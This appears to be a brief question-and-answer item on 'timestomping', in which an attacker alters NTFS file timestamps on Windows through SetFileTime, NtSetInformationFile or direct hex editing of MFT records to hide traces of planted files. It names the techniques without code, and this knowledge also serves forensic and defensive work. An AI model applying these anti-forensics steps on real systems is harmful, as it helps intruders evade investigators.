How can an attacker modify file timestamps to cover their tracks after deploying or overwriting files on a Windows system?

Attackers can use WinAPI `SetFileTime` to modify CreateTime, AccessTime, and LastWriteTime, or use NTAPI calls like `NtSetInformationFile` to also modify MFTChangeTime—this is commonly called 'timestomping'. For deeper stealth, they may directly edit the MFT records (`$STANDARD_INFORMATION` and `$FILE_NAME`) using a hex editor like WinHex. Our Penetration Techniques - Time Attributes of NTFS Files in Windows article provides implementation details and code references.